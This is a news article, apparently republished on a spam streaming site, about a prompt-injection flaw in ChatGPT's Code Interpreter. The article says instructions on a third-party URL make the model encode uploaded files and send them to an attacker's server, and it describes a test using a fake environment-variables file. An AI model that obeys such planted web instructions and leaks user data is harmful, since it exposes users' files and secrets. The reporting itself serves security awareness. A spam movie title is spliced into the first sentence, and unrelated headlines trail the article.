Thanks to new ChatGPT updates like the Code Interpreter,Watch Four Riders (Hellfighters of the East) Online OpenAI's popular generative artificial intelligence is rife with more security concerns. According to research from security expert Johann Rehberger (and follow-up work from Tom's Hardware), ChatGPT has glaring security flaws that stem from its new file-upload feature.
This Tweet is currently unavailable. It might be loading or has been removed.
OpenAI's recent update to ChatGPT Plus added a myriad of new features, including DALL-E image generation and the Code Interpreter, which allows Python code execution and file analysis. The code is created and run in a sandbox environment that is unfortunately vulnerable to prompt injection attacks.
SEE ALSO: OpenAI's Sam Altman breaks silence on AI executive orderA known vulnerability in ChatGPT for some time now, the attack involves tricking ChatGPT into executing instructions from a third-party URL, leading it to encode uploaded files into a URL-friendly string and send this data to a malicious website. While the likelihood of such an attack requires specific conditions (e.g., the user must actively paste a malicious URL into ChatGPT), the risk remains concerning. This security threat could be realized through various scenarios, including a trusted website being compromised with a malicious prompt — or through social engineering tactics.
Tom's Hardware did some impressive work testing just how vulnerable users may be to this attack. The exploit was tested by creating a fake environment variables file and using ChatGPT to process and inadvertently send this data to an external server. Although the exploit's effectiveness varied across sessions (e.g., ChatGPT sometimes refused to load external pages or transmit file data), it raises significant security concerns, especially given the AI's ability to read and execute Linux commands and handle user-uploaded files in a Linux-based virtual environment.
As Tom's Hardware states in its findings, despite seeming unlikely, the existence of this security loophole is significant. ChatGPT should ideally notexecute instructions from external web pages, yet it does. Mashablereached out to OpenAI for comment, but it did not immediately respond to our request.
Topics Artificial Intelligence ChatGPT OpenAI
Will Smith resigns from the Academy after Oscars incidentPrince Harry's former car can be yours for a mere £71KBeyoncé's next 'Vogue' cover will be the first shot by a black photographerHow to meditate while driving and charging your electric car'Wordle' today: Here's the March 31 answerThe 10 most streamed movies of the week. 5 won Oscars.NFL hall of famer Randy Moss made a powerful statement with his tie'CODA' wins Academy Award for Best PictureWill Smith and Chris Rock: Why you cared so much about the slapAirbrushed photo of Trump Jr. and his girlfriend inspires hilarious comparisons'The Bubble' review: A waste of time and talentJim Acosta walks out of White House press briefing in protestNBC's Katy Tur confronts Trump over press: 'Do you have to put our lives in danger?''Wordle' today: Here's the March 31 answerNBC's Katy Tur confronts Trump over press: 'Do you have to put our lives in danger?'Cryptocurrency donors to Ukraine wanted to profit from contribution'CODA' wins Academy Award for Best Picture9 best spy movies on Netflix for a highA popular meme of Putin playing the piano is making a comebackSesame Street unveils new muppet Ameera, a wheelchair user and science enthusiast Norman Mailer’s Ripe Garbage Daniel in the Lion’s Den Headstone Epitaph An Indiana Inquisition Imaginary Current Events Holding the Line Too Damn High Close Encounters Available Space Rippling Trumpism Theater of Pain Repossessed Morning Star Red Scared Interior Decor Traffic Jam Paranoid Posting Curious George Degrowing Pains Against the Imposters
1.3367s , 8228.984375 kb
Copyright © 2025 Powered by 【Watch Four Riders (Hellfighters of the East) Online】,Wisdom Convergence Information Network